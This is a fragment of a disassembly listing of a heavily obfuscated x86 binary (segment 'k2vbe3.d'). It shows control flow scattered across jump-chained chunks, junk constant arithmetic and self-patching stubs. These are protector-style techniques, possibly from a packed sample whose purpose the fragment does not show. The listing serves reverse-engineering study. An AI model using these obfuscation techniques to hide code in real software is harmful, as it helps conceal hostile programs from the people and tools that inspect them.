; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_444A36:				; CODE XREF: sub_456541:loc_44C10Ej
		cmp	dword ptr [ebp-10h], 0
		jnz	loc_446833
		mov	eax, [ebp+8]
		push	eax
		jmp	loc_44B53D
; END OF FUNCTION CHUNK	FOR sub_456541
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_109. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_444A4A:				; CODE XREF: k2vbe3.d:004545FBj
		jmp	loc_443FE6
; ---------------------------------------------------------------------------
		test	ebx, 0CEE8A4F8h
		jmp	loc_456D26
; ---------------------------------------------------------------------------

loc_444A5A:				; CODE XREF: k2vbe3.d:00458207j
		add	edx, 0E8E9B0FEh
		mov	[edx], eax
		pop	edx
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_444A64:				; CODE XREF: sub_443EF6:loc_443EFCj
					; sub_44A79B+856Fj
		rol	eax, 0Dh
		push	edi
		mov	edi, eax
		xchg	edi, [esp+4+var_4]
		jmp	loc_456874
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------

locret_444A72:				; CODE XREF: k2vbe3.d:loc_44FBA8j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_444A73:				; CODE XREF: k2vbe3.d:0044DCBBj
					; sub_446258:loc_45B072j
		jmp	nullsub_406
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449788

loc_444A78:				; CODE XREF: sub_449788+6j
		jmp	nullsub_62
; END OF FUNCTION CHUNK	FOR sub_449788
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CE6C

loc_444A7D:				; CODE XREF: sub_44CE6C-93FFj
		xchg	eax, [edx]
		jmp	loc_43E67A
; END OF FUNCTION CHUNK	FOR sub_44CE6C
; ---------------------------------------------------------------------------

loc_444A84:				; CODE XREF: k2vbe3.d:004591B8j
		xchg	ebp, [eax]

; =============== S U B	R O U T	I N E =======================================



sub_444A86	proc near		; CODE XREF: sub_44B58F:loc_454115p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D528 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ebx, [esp-4+arg_0]
		push	offset sub_454BF9
		jmp	loc_43D528
sub_444A86	endp


; =============== S U B	R O U T	I N E =======================================



sub_444A97	proc near		; DATA XREF: sub_45496E:loc_457954o
		push	eax
		mov	eax, edx
		jmp	loc_441A84
sub_444A97	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45496E

loc_444A9F:				; CODE XREF: sub_45496E:loc_451ED0j
		sub	eax, 92A1B192h
		ror	eax, 9
		add	eax, 0AB67E9E7h
		jmp	loc_4559E0
; END OF FUNCTION CHUNK	FOR sub_45496E

; =============== S U B	R O U T	I N E =======================================



sub_444AB3	proc near		; DATA XREF: k2vbe3.d:00453797o

; FUNCTION CHUNK AT 0044C08E SIZE 00000005 BYTES

		lea	eax, nullsub_467
		mov	byte ptr [eax],	0C3h
		jmp	loc_44C08E
sub_444AB3	endp

; ---------------------------------------------------------------------------
		push	offset sub_43E49B
		jmp	loc_43FAAC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_424. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_444ACC:				; CODE XREF: sub_445124+96D1j
		jmp	loc_43CC29
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_444AD1:				; CODE XREF: sub_443F0D+10j
		jmp	loc_44816E
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453FF1

loc_444AD6:				; CODE XREF: sub_453FF1:loc_43DBBEj
					; sub_453FF1-15723j
		call	sub_45AA57
		test	eax, eax
		setnz	byte ptr [ebp-1]
		jmp	loc_44BC05
; END OF FUNCTION CHUNK	FOR sub_453FF1

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_444AE6	proc near		; CODE XREF: sub_453FF1j

; FUNCTION CHUNK AT 0044CE51 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	offset loc_4496C2
		jmp	loc_44CE51
sub_444AE6	endp

; ---------------------------------------------------------------------------

loc_444AF3:				; CODE XREF: k2vbe3.d:00453D91j
					; k2vbe3.d:loc_457ED1j
		add	ebx, 442837Bh
		xchg	ebx, [esp]
		jmp	sub_444FB1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_444B01:				; CODE XREF: sub_44C90E:loc_44905Aj
		mov	[ebp-104h], eax
		mov	dword ptr [ebp-100h], 276E6143h
		mov	dword ptr [ebp-0FCh], 6F6C2074h
		mov	dword ptr [ebp-0F8h], 206461h
		jmp	loc_43C49C
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		sbb	ecx, 0ED565CD7h
		mov	ebp, ebx
		jmp	sub_4596A9
; ---------------------------------------------------------------------------

loc_444B37:				; DATA XREF: sub_45812F-16196o
		pop	ebp
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_444B39:				; CODE XREF: sub_44C90E-8369j
		jmp	loc_455343
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_444B3E	proc near		; CODE XREF: sub_442F4C+Dj
					; sub_4545C4-D37Ep ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043EA33 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F342 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F49F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044015E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004402B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004407D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044216E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044244E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004426B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004427BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443893 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446BC6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446D8E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044734A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448872 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00449C1A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B395 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B7AD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044F38F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00450AB6 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00451246 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004513A7 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00451FE2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045596E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458E7A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00459C28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B59C SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045B753 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045B827 SIZE 0000001B BYTES

		call	sub_448834

loc_444B43:				; CODE XREF: sub_45C089-1FA2Aj
		or	ecx, 6987655Eh
		call	sub_448218

loc_444B4E:				; CODE XREF: sub_43E470:loc_454AA6j
		push	0E9976489h

loc_444B53:				; CODE XREF: sub_4437D3:loc_459B3Cj
		pop	edx
		sub	edx, 6C9D3A68h
		cmp	edx, 3DBFC18Dh
		jmp	loc_449C1A
sub_444B3E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_444B65	proc near		; CODE XREF: sub_43C7B9+9p
					; k2vbe3.d:0043F28Dj
		xchg	edi, [esp+0]
		pop	edi
		mov	ds:dword_44DA5C, eax
		retn
sub_444B65	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444B70:				; CODE XREF: k2vbe3.d:004485E2j
		jmp	loc_448F1B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4472D9

loc_444B75:				; CODE XREF: sub_4472D9+13j
		jmp	loc_446DDC
; END OF FUNCTION CHUNK	FOR sub_4472D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454FA8

loc_444B7A:				; CODE XREF: sub_454FA8:loc_442898j
		rol	eax, 15h
		jmp	loc_44B203
; END OF FUNCTION CHUNK	FOR sub_454FA8
; ---------------------------------------------------------------------------

loc_444B82:				; CODE XREF: k2vbe3.d:00445EC9j
		add	edi, edx
		jmp	sub_443940
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_199. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E971

loc_444B8A:				; CODE XREF: sub_44E971+64E1j
		jmp	loc_457A9C
; END OF FUNCTION CHUNK	FOR sub_44E971
; ---------------------------------------------------------------------------

loc_444B8F:				; CODE XREF: k2vbe3.d:00459F05j
		jle	loc_4556F7
		adc	eax, 0AB783117h
		jmp	loc_43FAC2

; =============== S U B	R O U T	I N E =======================================



sub_444BA0	proc near		; CODE XREF: k2vbe3.d:004425C2j
					; sub_446478-39F0p
		xchg	esi, [esp+0]
		pop	esi
		add	ebx, 94479912h
		mov	[ebx], eax
		pop	ebx
		jmp	loc_440B91
sub_444BA0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	esi, 49706480h
		jmp	sub_454639
; ---------------------------------------------------------------------------

loc_444BBD:				; CODE XREF: k2vbe3.d:00447A80j
					; k2vbe3.d:0044E11Fj
		jl	loc_456108

; =============== S U B	R O U T	I N E =======================================



sub_444BC3	proc near		; CODE XREF: sub_44BDBB:loc_4518F1p

; FUNCTION CHUNK AT 0044A4F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AA64 SIZE 0000000D BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		ror	eax, 10h
		sub	eax, 74A51BA3h
		jmp	loc_44AA64
sub_444BC3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_444BD5	proc near		; DATA XREF: k2vbe3.d:00444A2Co

; FUNCTION CHUNK AT 0043E805 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C32C SIZE 0000000B BYTES

		push	edi
		call	sub_43E107

loc_444BDB:				; CODE XREF: k2vbe3.d:00451541j
		jmp	loc_45C32C
sub_444BD5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_444BE0:				; CODE XREF: sub_44A79B+2A69j
		jmp	loc_4574F7
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_444BE5:				; CODE XREF: sub_44ED3C-10A78j
		jmp	nullsub_270
; END OF FUNCTION CHUNK	FOR sub_44ED3C

; =============== S U B	R O U T	I N E =======================================



sub_444BEA	proc near		; CODE XREF: k2vbe3.d:0044C7F3j
					; sub_45C041-B86Dp

; FUNCTION CHUNK AT 0043C012 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440C49 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044946F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045503F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045713C SIZE 00000016 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	ecx, ebp
		add	ecx, 7AF0149Eh
		mov	ecx, [ecx]
		jmp	loc_44946F
sub_444BEA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_444BFD:				; CODE XREF: sub_43DFE1+Cj
					; sub_43DFE1+C112j
		or	edi, 0DB77D9B9h
		xor	edi, 0F277239Ah
		add	edi, 0F6BBCC09h
		xchg	edi, [esp+0]
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
		xor	edx, edi
		add	ebp, 0BCB3B2FFh
		jmp	sub_449995
; ---------------------------------------------------------------------------

loc_444C24:				; DATA XREF: sub_4445E2:loc_448332o
		xchg	edx, [esp]
		push	0A6971C7Ah
		pop	ebx
		and	ebx, 914CB439h
		xor	ebx, 257544B1h
		add	ebx, 67C210EEh
		jmp	loc_43C8E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_444C44:				; CODE XREF: sub_44B999+5C6Cj
		cdq

loc_444C45:				; CODE XREF: sub_44B999:loc_4515F6j
		add	eax, ds:4000F3h
		or	eax, 72A1E281h
		add	eax, 8694A2h
		xchg	eax, [esp-0Ch+arg_8]
		jmp	sub_45A252
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_444C5F:				; CODE XREF: sub_457D4B+3030j
		push	eax
		call	sub_449372
		test	eax, eax
		jnz	loc_4521A9
		jmp	loc_450B35
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_444C72:				; CODE XREF: sub_446E24+DE4Fj
		test	ebx, 0C241D711h

loc_444C78:				; CODE XREF: k2vbe3.d:00441077j
		jmp	loc_447283
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

locret_444C7D:				; CODE XREF: k2vbe3.d:loc_45AD86j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458019

loc_444C7E:				; CODE XREF: sub_458019-8AEEj
		jmp	loc_4493B0
; END OF FUNCTION CHUNK	FOR sub_458019
; ---------------------------------------------------------------------------

loc_444C83:				; CODE XREF: k2vbe3.d:004485BCj
		jmp	loc_4567FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_444C88:				; CODE XREF: sub_449372-2A63j
		jmp	sub_44B2D7
; END OF FUNCTION CHUNK	FOR sub_449372

; =============== S U B	R O U T	I N E =======================================



sub_444C8D	proc near		; CODE XREF: k2vbe3.d:0043E3DAp
					; k2vbe3.d:0044E9E6j
		xchg	edi, [esp+0]
		pop	edi
		jmp	loc_4499C7
sub_444C8D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_444C96:				; CODE XREF: sub_44C90E-D672j
					; sub_44C90E:loc_447838j ...
		mov	dword ptr [ebp-4], 1
		jmp	loc_447D0F
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B667

loc_444CA2:				; CODE XREF: sub_44B667+13j
		call	sub_440F1B

loc_444CA7:				; CODE XREF: k2vbe3.d:00453B24j
		jmp	loc_4493E4
; END OF FUNCTION CHUNK	FOR sub_44B667
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_444CAC:				; CODE XREF: sub_43EEC6:loc_440BE2j
		jnz	loc_442D25
		jmp	loc_453DE1
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------
		rol	eax, 4
		push	edx
		push	88543ECFh
		pop	edx
		sub	edx, 17B657A8h
		jmp	loc_45936A
; ---------------------------------------------------------------------------

loc_444CCC:				; DATA XREF: sub_43EBB1+5o
		jno	loc_441875
		mov	eax, [esp]
		push	esi
		mov	esi, edx
		xchg	esi, [esp]
		call	sub_44367E

loc_444CE0:				; CODE XREF: k2vbe3.d:0044BAC2j
		push	0CC45E9A6h
		pop	eax
		jmp	loc_43E5F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_444CEB:				; CODE XREF: sub_45B74D:loc_45AD8Bj
		mov	ecx, edx
		pop	edx
		pop	edx
		pop	ebx
		jmp	loc_457924
; END OF FUNCTION CHUNK	FOR sub_45B74D
; ---------------------------------------------------------------------------

loc_444CF5:				; CODE XREF: k2vbe3.d:loc_451754j
		jz	loc_45668B
; START	OF FUNCTION CHUNK FOR sub_456666

loc_444CFB:				; CODE XREF: k2vbe3.d:0043CAD7j
					; sub_456666:loc_456685j
		jb	loc_450415
		cmp	dword ptr [ebp-1Ch], 0Fh
		jnz	loc_451DCC
		mov	eax, [ebp-1Ch]
		shl	eax, 8
		mov	edx, [ebp-20h]
		jmp	loc_440E98
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
		push	ebx
		push	24527108h
		pop	ebx
		or	ebx, 68C38B5Bh
		jmp	loc_44FAE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442745

loc_444D2B:				; CODE XREF: sub_442745+4643j
		and	edx, 599DD086h
		push	offset sub_448CC1
		jmp	nullsub_490
; END OF FUNCTION CHUNK	FOR sub_442745
; ---------------------------------------------------------------------------

loc_444D3B:				; DATA XREF: sub_441632:loc_44F3BCo
		mov	[ebp-4], eax
		mov	eax, offset dword_4411BC
		call	sub_45AA40
		mov	eax, [ebp-4]
		mov	esp, ebp
		push	offset loc_45AA3E
		jmp	locret_451C4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44316D

loc_444D57:				; CODE XREF: sub_44316D+Ej
		call	sub_4436CE
		mov	edx, 92B16BD7h
		call	sub_45B20A
		call	sub_4436CE
		mov	edx, 9E849D81h
		jmp	loc_44C4FE
; END OF FUNCTION CHUNK	FOR sub_44316D
; ---------------------------------------------------------------------------

loc_444D75:				; CODE XREF: k2vbe3.d:00459EF8j
		jnb	loc_43FD0E

; =============== S U B	R O U T	I N E =======================================



sub_444D7B	proc near		; CODE XREF: sub_447594+B3D2p

; FUNCTION CHUNK AT 0043D1A2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00441C3A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442AE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443816 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00444000 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004465A1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447D4A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00449634 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A4CF SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044BF17 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044C0E0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044CC54 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044DE18 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E15D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450844 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00451063 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452651 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004527EC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00452970 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00456A72 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458199 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A9E4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B128 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B2DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B34B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BA1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BFA4 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [eax+edx], 0
		inc	dword ptr [ebp-4]
		cmp	dword ptr [ebp-4], 100h
		jmp	loc_45A9E4
sub_444D7B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444D92:				; CODE XREF: k2vbe3.d:004522B0j
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_444D94:				; CODE XREF: k2vbe3.d:00454D82j
		jmp	loc_44FD4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_444D99:				; CODE XREF: sub_45B20A-18523j
		jmp	loc_449248
; END OF FUNCTION CHUNK	FOR sub_45B20A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_492. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_444D9F:				; CODE XREF: sub_45AD42-9344j
		jmp	loc_43D49F
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------

loc_444DA4:				; CODE XREF: k2vbe3.d:0044623Ej
		jmp	loc_4431E0

; =============== S U B	R O U T	I N E =======================================



sub_444DA9	proc near		; CODE XREF: sub_43D244+70FAp
					; sub_43CF35+B91Fp ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E94F SIZE 00000015 BYTES

		js	sub_4455EE
		push	edx
		mov	edx, ebp

loc_444DB2:				; CODE XREF: sub_441172-491Ej
		xchg	edx, [esp+4+var_4]
		jmp	loc_43E94F
sub_444DA9	endp

; ---------------------------------------------------------------------------

loc_444DBA:				; CODE XREF: k2vbe3.d:loc_4432C6j
		sub	esi, 0E27E70CCh
		push	offset sub_44A888
		jmp	loc_449805
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_444DCA:				; CODE XREF: sub_44D59D-DCEAj
		jbe	loc_44ADE6
		adc	edi, eax
		cmp	edi, 0BB56E48Bh
		jmp	loc_452855
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_444DDD:				; CODE XREF: sub_45451C-2A7Aj
					; sub_45451C:loc_4580C6j
		call	sub_4436CE
		mov	edx, 4CB976E9h
		call	sub_45B20A
		push	eax
		push	offset loc_444998
		jmp	loc_4484B9
; END OF FUNCTION CHUNK	FOR sub_45451C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A60

loc_444DF7:				; CODE XREF: sub_459A60:loc_459C54j
		mov	[ecx], edi
		pop	ecx
		or	eax, 0C418758Bh
		shl	ebx, 13h
		jmp	loc_458D64
; END OF FUNCTION CHUNK	FOR sub_459A60
; ---------------------------------------------------------------------------

loc_444E08:				; CODE XREF: k2vbe3.d:0044B726j
		and	edx, esi
		mov	esi, edx
		sub	ebx, esi

loc_444E0E:				; CODE XREF: k2vbe3.d:loc_44B714j
		add	eax, 0D3E3A273h
		add	eax, ebp
		add	eax, 2FCD132Ah
		jmp	loc_44A48C
; ---------------------------------------------------------------------------

loc_444E21:				; DATA XREF: sub_44B15C+Ao
		push	537B2BAAh
		pop	ebx
		sub	ebx, 0FDAFD5C3h
		test	ebx, 40000000h
		jmp	loc_43F9DE
; ---------------------------------------------------------------------------
		pop	edi
		jmp	sub_43C865
; ---------------------------------------------------------------------------
		and	eax, 0E7D74D71h
		or	esi, ecx
		jmp	loc_448F86
; ---------------------------------------------------------------------------

loc_444E4B:				; CODE XREF: k2vbe3.d:loc_44E624j
					; DATA XREF: sub_456471-4311o
		mov	ecx, [ecx]
		pushf
		push	58738557h
		pop	eax
		or	eax, 713B2BBBh
		and	eax, 99B912C8h
		xor	eax, 193902C9h
		jmp	loc_447AE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_444E6B:				; CODE XREF: sub_4505F8:loc_450C53j
		or	eax, eax
		jnz	loc_457F13
		jmp	loc_44EE3F
; END OF FUNCTION CHUNK	FOR sub_4505F8
; ---------------------------------------------------------------------------

loc_444E78:				; CODE XREF: k2vbe3.d:004439ADj
		or	edx, edx
		jnz	loc_44BCA0
		jmp	loc_4430F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_444E85:				; CODE XREF: sub_44B999:loc_45A17Bj
		jnz	loc_44E7CF
		jmp	loc_44F8E1
; END OF FUNCTION CHUNK	FOR sub_44B999

; =============== S U B	R O U T	I N E =======================================



sub_444E90	proc near		; CODE XREF: k2vbe3.d:0043C311j
					; sub_441850:loc_441862p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E982 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442260 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044DFAD SIZE 00000023 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ecx, [esp+0]
		push	ecx
		pop	edx
		jmp	loc_442260
sub_444E90	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_444E9E	proc near		; DATA XREF: sub_44921C:loc_451A72o

; FUNCTION CHUNK AT 00451770 SIZE 00000005 BYTES

		mov	byte ptr [eax],	0C3h
		jmp	loc_451770
sub_444E9E	endp

; ---------------------------------------------------------------------------
		xchg	eax, [esp]
		mov	edx, eax
		pop	eax
		mov	eax, [esp]
		push	edx
		call	sub_443A95
		mov	eax, 24CC2B1h
		jmp	loc_44E4D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_444EBF:				; CODE XREF: sub_456666-6244j
		shl	eax, 8
		mov	edx, [ebp-20h]

loc_444EC5:				; CODE XREF: k2vbe3.d:0043E164j
		movzx	edx, byte ptr [edx]
		or	eax, edx
		jmp	loc_43FC26
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
		and	ecx, 55A6BFCFh
		jmp	loc_443010
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458951

loc_444EDA:				; CODE XREF: sub_458951:loc_44FB9Ej
		push	edx
		push	ebx
		push	7147990Ch
		pop	ebx
		xor	ebx, 7307E0B2h
		add	ebx, 0FE049669h
		jmp	loc_45315C
; END OF FUNCTION CHUNK	FOR sub_458951
; ---------------------------------------------------------------------------
		test	eax, edi
		jmp	loc_4448E1

; =============== S U B	R O U T	I N E =======================================



sub_444EFA	proc near		; CODE XREF: k2vbe3.d:0043EA58j
					; sub_444FB1+3p

arg_0		= dword	ptr  4
arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0043C333 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043CD0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E76D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00440FEF SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00446BE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446E16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446F6A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447194 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00448E6B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044982A SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044AB2B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B276 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BB68 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BDB1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045105E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456DA5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045BBC9 SIZE 0000001A BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	esi, [esp-4+arg_0]
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		push	0B4D51B1Eh
		jmp	loc_440FEF
sub_444EFA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		shl	ebx, 9
		jmp	loc_44D296
; ---------------------------------------------------------------------------
		db 50h,	0DBh, 0FBh
dword_444F1C	dd 0			; DATA XREF: sub_454225-14A45w
					; sub_454234-C490r ...
dword_444F20	dd 77E805D8h		; DATA XREF: sub_45AF0E:loc_43C000r
					; k2vbe3.d:loc_44A956r	...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453141

loc_444F24:				; CODE XREF: sub_453141+9j
		jmp	sub_457F1C
; END OF FUNCTION CHUNK	FOR sub_453141
; ---------------------------------------------------------------------------
		db 8Ch,	2Eh, 0EDh
		dd 0A3BF38D8h
dword_444F30	dd 0CBBF38DCh		; DATA XREF: sub_44E0F6+7r
					; k2vbe3.d:004549FBw
; ---------------------------------------------------------------------------

loc_444F34:				; CODE XREF: k2vbe3.d:00442C1Dj
		jmp	locret_455B94
; ---------------------------------------------------------------------------
		db 0B5h, 0E0h, 43h
dword_444F3C	dd 0B4D3BF30h		; DATA XREF: sub_4423D2+4r
					; k2vbe3.d:00442D98w ...
; ---------------------------------------------------------------------------

loc_444F40:				; CODE XREF: k2vbe3.d:00453F80j
		jmp	nullsub_514
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448159

loc_444F45:				; CODE XREF: sub_448159+1036j
		jmp	loc_443119
; END OF FUNCTION CHUNK	FOR sub_448159
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_444F4A:				; CODE XREF: sub_44B912:loc_446196j
		push	ecx
		push	0C6656243h
